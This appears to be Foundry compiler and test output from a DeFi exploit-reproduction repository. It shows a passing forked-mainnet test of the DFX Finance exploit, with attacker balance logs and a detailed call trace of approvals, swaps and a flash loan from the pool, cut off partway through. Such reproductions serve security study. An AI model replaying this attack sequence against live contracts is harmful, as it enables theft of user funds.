Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.27s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
  --> src/test/2022-11/DFX_exp.sol:26:5:
   |
26 |     IERC20 USDC = IERC20(0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48);
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
    --> src/test/interface.sol:3064:1:
     |
3064 | interface USDC {
     | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
  --> src/test/2022-11/DFX_exp.sol:27:5:
   |
27 |     IERC20 WETH = IERC20(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2);
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (9302): Return value of low-level calls not used.
  --> src/test/2022-11/DFX_exp.sol:39:9:
   |
39 |         address(WETH).call{value: 2 ether}("");
   |         ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2022-11/DFX_exp.sol:62:28:
   |
62 |     function flashCallback(uint256 fee0, uint256 fee1, bytes calldata data) external {
   |                            ^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2022-11/DFX_exp.sol:62:42:
   |
62 |     function flashCallback(uint256 fee0, uint256 fee1, bytes calldata data) external {
   |                                          ^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2022-11/DFX_exp.sol:62:56:
   |
62 |     function flashCallback(uint256 fee0, uint256 fee1, bytes calldata data) external {
   |                                                        ^^^^^^^^^^^^^^^^^^^


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 953.59ms (1.90ms CPU time)

Ran 1 test for src/test/2022-11/DFX_exp.sol:ContractTest
[PASS] testExploit() (gas: 763412)
Logs:
  [Before] Attacker USDC balance before exploit: 2550.005819
  [End] Attacker USDC balance after exploit: 173219.649163

Traces:
  [5779] ContractTest::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 15941703 [1.594e7])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [817212] ContractTest::testExploit()
    ├─ [23731] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::fallback{value: 2000000000000000000}()
    │   ├─ emit Deposit(dst: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], wad: 2000000000000000000 [2e18])
    │   ├─  storage changes:
    │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0 → 0x0000000000000000000000000000000000000000000000001bc16d674ec80000
    │   └─ ← [Stop]
    ├─ [24420] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::approve(0xE592427A0AEce92De3Edee1F18E0157C05861564, 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0xE592427A0AEce92De3Edee1F18E0157C05861564, value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─  storage changes:
    │   │   @ 0xea1c3a4a4742936b53e6e02c27b97246c87f6290ad743a3efb6894b7bf708cd4: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   └─ ← [Return] true
    ├─ [38367] 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48::approve(0xE592427A0AEce92De3Edee1F18E0157C05861564, 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─ [31078] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::approve(0xE592427A0AEce92De3Edee1F18E0157C05861564, 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77]) [delegatecall]
    │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0xE592427A0AEce92De3Edee1F18E0157C05861564, value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   ├─  storage changes:
    │   │   │   @ 0xc81d9832a58ca5596ef91aeee7b9876071d1b466739bb153bc12d9794dc6ec7e: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   └─ ← [Return] true
    │   └─ ← [Return] true
    ├─ [27867] 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48::approve(0x46161158b1947D9149E066d6d31AF1283b2d377C, 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─ [27078] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::approve(0x46161158b1947D9149E066d6d31AF1283b2d377C, 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77]) [delegatecall]
    │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x46161158b1947D9149E066d6d31AF1283b2d377C, value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   ├─  storage changes:
    │   │   │   @ 0x27266a933beee98a83cf358f7efd3bce1608669ec0990dc938739b848f5d91f1: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   └─ ← [Return] true
    │   └─ ← [Return] true
    ├─ [38458] 0xebF2096E01455108bAdCbAF86cE30b6e5A72aa52::approve(0xE592427A0AEce92De3Edee1F18E0157C05861564, 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─ [31176] 0x78fe13802Ba4E487F69c87850eA557CfC292b472::approve(0xE592427A0AEce92De3Edee1F18E0157C05861564, 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77]) [delegatecall]
    │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0xE592427A0AEce92De3Edee1F18E0157C05861564, value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   ├─  storage changes:
    │   │   │   @ 0x79d9846fbf5ba218e1675f258b761876af9d0333b76e2773cfc8b3432ed7262b: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   └─ ← [Return] true
    │   └─ ← [Return] true
    ├─ [27958] 0xebF2096E01455108bAdCbAF86cE30b6e5A72aa52::approve(0x46161158b1947D9149E066d6d31AF1283b2d377C, 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─ [27176] 0x78fe13802Ba4E487F69c87850eA557CfC292b472::approve(0x46161158b1947D9149E066d6d31AF1283b2d377C, 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77]) [delegatecall]
    │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x46161158b1947D9149E066d6d31AF1283b2d377C, value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   ├─  storage changes:
    │   │   │   @ 0x6200be9415d665c0b9d12b8ae15eba82ec01318cb52c0c916659aca2d93e6373: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   └─ ← [Return] true
    │   └─ ← [Return] true
    ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 2000000000000000000 [2e18]
    ├─ [86356] 0xE592427A0AEce92De3Edee1F18E0157C05861564::exactInputSingle(ExactInputSingleParams({ tokenIn: 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2, tokenOut: 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48, fee: 500, recipient: 0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496, deadline: 1668108467 [1.668e9], amountIn: 2000000000000000000 [2e18], amountOutMinimum: 0, sqrtPriceLimitX96: 0 }))
    │   ├─ [78895] 0x88e6A0c2dDD26FEEb64F039a2c41296FcB3f5640::swap(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], false, 2000000000000000000 [2e18], 1461446703485210103287273052203988822378723970341 [1.461e48], 0x000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000000400000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496000000000000000000000000000000000000000000000000000000000000002bc02aaa39b223fe8d0a0e5c4f27ead9083c756cc20001f4a0b86991c6218b36c1d19d4a2e9eb0ce3606eb48000000000000000000000000000000000000000000)
    │   │   ├─ [33517] 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 2550005819 [2.55e9])
    │   │   │   ├─ [32728] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 2550005819 [2.55e9]) [delegatecall]
    │   │   │   │   ├─ emit Transfer(from: 0x88e6A0c2dDD26FEEb64F039a2c41296FcB3f5640, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 2550005819 [2.55e9])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0xea80dd88ed2c8da1b3cfa53b6b2568ae58fe83d484d0c01324a62ba1aa9ffdac: 0 → 0x0000000000000000000000000000000000000000000000000000000097fe003b
    │   │   │   │   │   @ 0x1f21a62c4538bacf2aabeca410f0fe63151869f172e03c0e00357ba26a341eff: 0x0000000000000000000000000000000000000000000000000000290c56149564 → 0x0000000000000000000000000000000000000000000000000000290bbe169529
    │   │   │   │   └─ ← [Return] true
    │   │   │   └─ ← [Return] true
    │   │   ├─ [2534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(0x88e6A0c2dDD26FEEb64F039a2c41296FcB3f5640) [staticcall]
    │   │   │   └─ ← [Return] 71950373467838886518948 [7.195e22]
    │   │   ├─ [10327] 0xE592427A0AEce92De3Edee1F18E0157C05861564::uniswapV3SwapCallback(-2550005819 [-2.55e9], 2000000000000000000 [2e18], 0x000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000000400000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496000000000000000000000000000000000000000000000000000000000000002bc02aaa39b223fe8d0a0e5c4f27ead9083c756cc20001f4a0b86991c6218b36c1d19d4a2e9eb0ce3606eb48000000000000000000000000000000000000000000)
    │   │   │   ├─ [6225] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x88e6A0c2dDD26FEEb64F039a2c41296FcB3f5640, 2000000000000000000 [2e18])
    │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x88e6A0c2dDD26FEEb64F039a2c41296FcB3f5640, value: 2000000000000000000 [2e18])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x390f6178407c9b8e95802b8659e6df8e34c1e3d4f8d6a49e6132bbcdd937b63a: 0x000000000000000000000000000000000000000000000f3c700403953b5520a4 → 0x000000000000000000000000000000000000000000000f3c8bc570fc8a1d20a4
    │   │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x0000000000000000000000000000000000000000000000001bc16d674ec80000 → 0
    │   │   │   │   └─ ← [Return] true
    │   │   │   └─ ← [Stop]
    │   │   ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(0x88e6A0c2dDD26FEEb64F039a2c41296FcB3f5640) [staticcall]
    │   │   │   └─ ← [Return] 71952373467838886518948 [7.195e22]
    │   │   ├─ emit Swap(param0: 0xE592427A0AEce92De3Edee1F18E0157C05861564, param1: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param2: -2550005819 [-2.55e9], param3: 2000000000000000000 [2e18], param4: 2218280876708103843786705821220208 [2.218e33], param5: 13596670582240942422 [1.359e19], param6: 204808 [2.048e5])
    │   │   ├─  storage changes:
    │   │   │   @ 0: 0x00010002d002d001200320080000000000006d5e7e733919ccb8355c9a42bbde → 0x00010002d002d001200320080000000000006d5ea41668fac7aaa45d0a67bd70
    │   │   │   @ 2: 0x00000000000000000000000000000b1c84a6d89495c016482a6509e7d4e37750 → 0x00000000000000000000000000000b1c84abaa8055d80739d2994ead4061260a
    │   │   └─ ← [Return] -2550005819 [-2.55e9], 2000000000000000000 [2e18]
    │   └─ ← [Return] 2550005819 [2.55e9]
    ├─ [1315] 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   ├─ [529] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [delegatecall]
    │   │   └─ ← [Return] 2550005819 [2.55e9]
    │   └─ ← [Return] 2550005819 [2.55e9]
    ├─ emit log_named_decimal_uint(key: "[Before] Attacker USDC balance before exploit", val: 2550005819 [2.55e9], decimals: 6)
    ├─ [1315] 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   ├─ [529] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [delegatecall]
    │   │   └─ ← [Return] 2550005819 [2.55e9]
    │   └─ ← [Return] 2550005819 [2.55e9]
    ├─ [101664] 0xE592427A0AEce92De3Edee1F18E0157C05861564::exactInputSingle(ExactInputSingleParams({ tokenIn: 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48, tokenOut: 0xebF2096E01455108bAdCbAF86cE30b6e5A72aa52, fee: 500, recipient: 0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496, deadline: 1668108467 [1.668e9], amountIn: 1275002909 [1.275e9], amountOutMinimum: 0, sqrtPriceLimitX96: 0 }))
    │   ├─ [94232] 0xE558f01FCb39B11B2000D11e9a18DcF105f78964::swap(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], true, 1275002909 [1.275e9], 4295128740 [4.295e9], 0x000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000000400000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496000000000000000000000000000000000000000000000000000000000000002ba0b86991c6218b36c1d19d4a2e9eb0ce3606eb480001f4ebf2096e01455108badcbaf86ce30b6e5a72aa52000000000000000000000000000000000000000000)
    │   │   ├─ [34121] 0xebF2096E01455108bAdCbAF86cE30b6e5A72aa52::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 19873424633278 [1.987e13])
    │   │   │   ├─ [33339] 0x78fe13802Ba4E487F69c87850eA557CfC292b472::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 19873424633278 [1.987e13]) [delegatecall]
    │   │   │   │   ├─ emit Transfer(from: 0xE558f01FCb39B11B2000D11e9a18DcF105f78964, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 19873424633278 [1.987e13])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x5223e63f0507f82c7e25e324cdfe3030bae704b36135ec7694b55330a3b5b731: 0 → 0x00000000000000000000000000000000000000000000000000001213246a6dbe
    │   │   │   │   │   @ 0xb496c955f42445db28fa18b947aeed77cf415101c881261bd65945ecae63ac22: 0x000000000000000000000000000000000000000000000000001fbdb38f43ddd8 → 0x000000000000000000000000000000000000000000000000001faba06ad9701a
    │   │   │   │   └─ ← [Return] true
    │   │   │   └─ ← [Return] true
    │   │   ├─ [3315] 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48::balanceOf(0xE558f01FCb39B11B2000D11e9a18DcF105f78964) [staticcall]
    │   │   │   ├─ [2529] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::balanceOf(0xE558f01FCb39B11B2000D11e9a18DcF105f78964) [delegatecall]
    │   │   │   │   └─ ← [Return] 220128727822 [2.201e11]
    │   │   │   └─ ← [Return] 220128727822 [2.201e11]
    │   │   ├─ [14848] 0xE592427A0AEce92De3Edee1F18E0157C05861564::uniswapV3SwapCallback(1275002909 [1.275e9], -19873424633278 [-1.987e13], 0x000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000000400000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496000000000000000000000000000000000000000000000000000000000000002ba0b86991c6218b36c1d19d4a2e9eb0ce3606eb480001f4ebf2096e01455108badcbaf86ce30b6e5a72aa52000000000000000000000000000000000000000000)
    │   │   │   ├─ [10792] 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0xE558f01FCb39B11B2000D11e9a18DcF105f78964, 1275002909 [1.275e9])
    │   │   │   │   ├─ [9997] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0xE558f01FCb39B11B2000D11e9a18DcF105f78964, 1275002909 [1.275e9]) [delegatecall]
    │   │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xE558f01FCb39B11B2000D11e9a18DcF105f78964, value: 1275002909 [1.275e9])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0xea80dd88ed2c8da1b3cfa53b6b2568ae58fe83d484d0c01324a62ba1aa9ffdac: 0x0000000000000000000000000000000000000000000000000000000097fe003b → 0x000000000000000000000000000000000000000000000000000000004bff001e
    │   │   │   │   │   │   @ 0x6880afd761842d3cdeedc0b7f76510afeab822c4b73a4bf299e44894163ee697: 0x0000000000000000000000000000000000000000000000000000003340b1d30e → 0x000000000000000000000000000000000000000000000000000000338cb0d32b
    │   │   │   │   │   │   @ 0xc81d9832a58ca5596ef91aeee7b9876071d1b466739bb153bc12d9794dc6ec7e: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffb400ffe2
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   └─ ← [Return] true
    │   │   │   └─ ← [Stop]
    │   │   ├─ [1315] 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48::balanceOf(0xE558f01FCb39B11B2000D11e9a18DcF105f78964) [staticcall]
    │   │   │   ├─ [529] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::balanceOf(0xE558f01FCb39B11B2000D11e9a18DcF105f78964) [delegatecall]
    │   │   │   │   └─ ← [Return] 221403730731 [2.214e11]
    │   │   │   └─ ← [Return] 221403730731 [2.214e11]
    │   │   ├─ emit Swap(param0: 0xE592427A0AEce92De3Edee1F18E0157C05861564, param1: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param2: 1275002909 [1.275e9], param3: -19873424633278 [-1.987e13], param4: 9892863035578907563257468411349 [9.892e30], param5: 735939883996233 [7.359e14], param6: 96549 [9.654e4])
    │   │   ├─  storage changes:
    │   │   │   @ 8: 0x010059e4bf00000031f6d38f521f7f321375ca366b0002a0eeec0b00636c191f → 0x010059e4bf000000326dfee6fb06aee5a33982fda20002a2ba2f6cd0636d50b3
    │   │   │   @ 1: 0x000000000000000000000000000000000000488a00b0ab8d0dc4e9790d6ea091 → 0x000000000000000000000000000000000000488db9221a4db5d608124488cf48
    │   │   │   @ 0: 0x000100004a004a0049017929000000000000007ce47a3fc3a6f0669e47a4af9c → 0x000100004a004a0000017925000000000000007cdd908173cf479a2d2341ddd5
    │   │   └─ ← [Return] 1275002909 [1.275e9], -19873424633278 [-1.987e13]
    │   └─ ← [Return] 19873424633278 [1.987e13]
    ├─ [60878] 0x46161158b1947D9149E066d6d31AF1283b2d377C::viewDeposit(200000000000000000000000 [2e23]) [staticcall]
    │   ├─ [54534] 0x5fcA000F8A1eF45Fe2412A8e305FF36D8757be0f::822f39d5(0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002a5a058fc295ed000000) [delegatecall]
    │   │   ├─ [9493] 0x08CD9D993840ccA86546f4Ebf166C78c7d8ff700::viewNumeraireBalanceLPRatio(500000000000000000 [5e17], 500000000000000000 [5e17], 0x46161158b1947D9149E066d6d31AF1283b2d377C) [staticcall]
    │   │   │   ├─ [3615] 0xebF2096E01455108bAdCbAF86cE30b6e5A72aa52::balanceOf(0x46161158b1947D9149E066d6d31AF1283b2d377C) [staticcall]
    │   │   │   │   ├─ [2836] 0x78fe13802Ba4E487F69c87850eA557CfC292b472::balanceOf(0x46161158b1947D9149E066d6d31AF1283b2d377C) [delegatecall]
    │   │   │   │   │   └─ ← [Return] 10242926208370988 [1.024e16]
    │   │   │   │   └─ ← [Return] 10242926208370988 [1.024e16]
    │   │   │   ├─ [3315] 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48::balanceOf(0x46161158b1947D9149E066d6d31AF1283b2d377C) [staticcall]
    │   │   │   │   ├─ [2529] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::balanceOf(0x46161158b1947D9149E066d6d31AF1283b2d377C) [delegatecall]
    │   │   │   │   │   └─ ← [Return] 448042647980 [4.48e11]
    │   │   │   │   └─ ← [Return] 448042647980 [4.48e11]
    │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000006d62aa5e2045b0d325283
    │   │   ├─ [5193] 0xc2E645C253FAf984B6Af2668798719b7c6AbAB95::viewNumeraireBalanceLPRatio(500000000000000000 [5e17], 500000000000000000 [5e17], 0x46161158b1947D9149E066d6d31AF1283b2d377C) [staticcall]
    │   │   │   ├─ [1315] 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48::balanceOf(0x46161158b1947D9149E066d6d31AF1283b2d377C) [staticcall]
    │   │   │   │   ├─ [529] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::balanceOf(0x46161158b1947D9149E066d6d31AF1283b2d377C) [delegatecall]
    │   │   │   │   │   └─ ← [Return] 448042647980 [4.48e11]
    │   │   │   │   └─ ← [Return] 448042647980 [4.48e11]
    │   │   │   ├─ [1315] 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48::balanceOf(0x46161158b1947D9149E066d6d31AF1283b2d377C) [staticcall]
    │   │   │   │   ├─ [529] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::balanceOf(0x46161158b1947D9149E066d6d31AF1283b2d377C) [delegatecall]
    │   │   │   │   │   └─ ← [Return] 448042647980 [4.48e11]
    │   │   │   │   └─ ← [Return] 448042647980 [4.48e11]
    │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000006d62aa5e2046c764adff8
    │   │   ├─ [6098] 0x08CD9D993840ccA86546f4Ebf166C78c7d8ff700::viewRawAmountLPRatio(500000000000000000 [5e17], 500000000000000000 [5e17], 0x46161158b1947D9149E066d6d31AF1283b2d377C, 1844674407370946816507483 [1.844e24]) [staticcall]
    │   │   │   ├─ [1615] 0xebF2096E01455108bAdCbAF86cE30b6e5A72aa52::balanceOf(0x46161158b1947D9149E066d6d31AF1283b2d377C) [staticcall]
    │   │   │   │   ├─ [836] 0x78fe13802Ba4E487F69c87850eA557CfC292b472::balanceOf(0x46161158b1947D9149E066d6d31AF1283b2d377C) [delegatecall]
    │   │   │   │   │   └─ ← [Return] 10242926208370988 [1.024e16]
    │   │   │   │   └─ ← [Return] 10242926208370988 [1.024e16]
    │   │   │   ├─ [1315] 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48::balanceOf(0x46161158b1947D9149E066d6d31AF1283b2d377C) [staticcall]
    │   │   │   │   ├─ [529] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::balanceOf(0x46161158b1947D9149E066d6d31AF1283b2d377C) [delegatecall]
    │   │   │   │   │   └─ ← [Return] 448042647980 [4.48e11]
    │   │   │   │   └─ ← [Return] 448042647980 [4.48e11]
    │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000008431a9cf6f28d
    │   │   ├─ [5798] 0xc2E645C253FAf984B6Af2668798719b7c6AbAB95::viewRawAmountLPRatio(500000000000000000 [5e17], 500000000000000000 [5e17], 0x46161158b1947D9149E066d6d31AF1283b2d377C, 1844674407370963506360810 [1.844e24]) [staticcall]
    │   │   │   ├─ [1315] 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48::balanceOf(0x46161158b1947D9149E066d6d31AF1283b2d377C) [staticcall]
    │   │   │   │   ├─ [529] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::balanceOf(0x46161158b1947D9149E066d6d31AF1283b2d377C) [delegatecall]
    │   │   │   │   │   └─ ← [Return] 448042647980 [4.48e11]
    │   │   │   │   └─ ← [Return] 448042647980 [4.48e11]
    │   │   │   ├─ [1315] 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48::balanceOf(0x46161158b1947D9149E066d6d31AF1283b2d377C) [staticcall]
    │   │   │   │   ├─ [529] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::balanceOf(0x46161158b1947D9149E066d6d31AF1283b2d377C) [delegatecall]
    │   │   │   │   │   └─ ← [Return] 448042647980 [4.48e11]
    │   │   │   │   └─ ← [Return] 448042647980 [4.48e11]
    │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000000000174876e800
    │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000003fc5f9cf6773036aa831000000000000000000000000000000000000000000000000000000000000004000000000000000000000000000000000000000000000000000000000000000020000000000000000000000000000000000000000000000000008431a9cf6f28d000000000000000000000000000000000000000000000000000000174876e800
    │   └─ ← [Return] 301161097723287729514545 [3.011e23], [2325581395325581 [2.325e15], 100000000000 [1e11]]
    ├─ [184812] 0x46161158b1947D9149E066d6d31AF1283b2d377C::flash(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 2313953488348953 [2.313e15], 99500000000 [9.95e10], 0x00)
    │   ├─ [1615] 0xebF2096E01455108bAdCbAF86cE30b6e5A72aa52::balanceOf(0x46161158b1947D9149E066d6d31AF1283b2d377C) [staticcall]
